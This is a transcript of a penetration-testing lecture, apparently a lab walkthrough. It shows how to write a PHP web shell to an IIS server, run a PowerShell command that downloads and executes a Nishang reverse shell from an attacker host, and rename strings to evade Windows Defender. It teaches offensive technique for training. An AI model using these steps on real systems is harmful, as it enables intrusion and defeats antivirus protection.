says that the file already exists. So it's probably there. Control L, Alt 1, and PHP info. What do we name it? Oh, we need to update. Yes. So this is really good. And we can actually see that it's saying it's Windows Server 2016. So we've got more information here, and since we are able to write arbitrary files to the web server and then we can access those files, we can upload a web shell. So let's convert this potentially harmless query into a web shell now. So I'm going to send this to system. I'm just going to name it like so. And since these are single ticks, we might get a conflict. So let's change these to double quotes on the outside. And we probably need to change this file name. So let's say updates. And control space. Changes to updates. That's good. See, now what we're doing is we're passing this parameter. And we're going to say, who am I? We're going to put in our command, and it works. So the way this works is we're actually using this request function. So if we go to php.net, you can see what this does. HTTP request variables, it's an array that stores GET, POST, and cookie requests. So here, we put in a GET request with this variable, C equals, which was defined here. So the value of C is who am I? And who am I is a Windows command. And that's being passed to system. So it's going to be executed on the system, on the local system. And the results will be reflected in the HTTP response. And that's why we see this right here. For example, I can do ipconfig. Right, I'm getting the configuration of the system. I can see the IP. Where is it? Here it is right here. If we do Control U, you'll see it's nicely formatted, right? So now let's turn this into a proper shell. And first I want to make sure that PowerShell is actually on here, because that'll make my life easier. And it is, because this PowerShell command worked. If I type PowerShell with 3 L's, we get an error message, right? Well, we just get nothing. But when I remove one of the L's, you can see we get what we want. So we know PowerShell, we can pass arbitrary commands to PowerShell on the victim host. Let's turn on burp. And let's grab this. In the history, Control R, Control Shift R, and we'll name this web. Actually, we'll name this Nishang. That's the reverse shell we're going to use. And I want to change this from a GET request method to a POST, so that I don't run into any character encoding issues, and it's a lot easier to read this way. Control space. There we go. So what are we going to do here? Let's start with Nishang. So locate Nishang. If you don't have Nishang, you can just do sudo apt install Nishang, like so. And you can see what we actually want is this invoke PowerShell TCP. So I'm going to grab this, sudo copy, Control Shift V, and copy that to the current folder, sudo vim, and that's the one we want. Set number. And what we need to do is go down here, and we're going to use this template on this line. So we're going to update the IP address and port to connect back to. So this is going to be the IP address and port that the victim machine is going to connect back to on our target machine. So this is our local attacker IP and the local attacker port. Okay. So I'm going to press YY to yank, capital G to go to the bottom, I, insert mode, enter, and then escape, capital P, and then delete word, I, and let's go ahead and put in our IP address. Let's see, delete. What are we? Control A, Shift %, IPA, grep ton 0. We are 10.10.14.10. 10.10.10.14.10, and let's use port 443 because that's usually allowed on firewalls. Escape, Shift ZZ. Okay. Now what we can do is we can set up a web server on our local box on port 80, and then we can set up a local netcat listener on port 443 to catch a reverse shell. So let me explain what's going to happen in a second. Let me first create the command. So we're going to say PowerShell, invoke expression, invoke web request, HTTP 10.10.14.10, invoke PowerShell TCP.ps1, use basic parsing. Okay, I believe that's it. But let's explain what's happening here. So this is our attacker machine. We're hosting this shell, which we just modified, right? This is telling the victim machine to make a GET request to the attacker machine and download this PowerShell script and then execute it. That's what invoke expression means, invoke it in memory. When it tries to execute the script contains code to establish a reverse shell from the victim to the attacker's port on 443. So we should get a shell in this box here. Let's go ahead and hit send. And we see the download right here, but no shell. So we probably have like AV or something on the victim that's messing with us. Windows Defender has been getting a lot better these days, so we might have to do some things. Let's go ahead and rename invoke PowerShell. Perhaps the local AV is just doing basic static string analysis. So escape, and we can just obfuscate the string and get past the AV. See, we can do sudo sed /i, and we're going to substitute everywhere we see PowerShell TCP. They're going to replace it with foo. G means global, capital I means case insensitive. That's how I was able to put invoke PowerShell TCP in lowercase. And the file I want to do this substitution on is invoke-PowerShell TCP.ps1. The -i just means do it in place. It means substitute this string with this string right here, and then write the newly substituted file back into the original here. All right. So now if I do, let's see, cat invoke grep, and then we look for foo, you'll see these lines have been updated, right? And that's the last line in the file. So I think if we do -n, it shows the file, the line numbers. So 127 is the last line, and so this has been updated. So now let's try it. We are still listening on port 80, and we're still waiting for the shell on 443. Control space. It's taking a little bit longer. Alt tab. Bam, we've got a shell. Who am I? User. All right, so we've got this shell, and we can see who else is on the box. Looks like there's an administrator, there's a guest, there's Hector. And so in the next lecture, we're actually going to do a horizontal escalation from this particular user, iUser, which appears to be a service. This is actually the service account that's running the IIS web application. And we'll investigate this again once we pop the box. We'll take a look at the services and the way it's set up. But in the next lecture, we're going to do horizontal escalation into Hector. And then in the next lecture after that, we'll move into true system compromise when we move, we get system access to the endpoint. All right, I'll see you in the next lecture.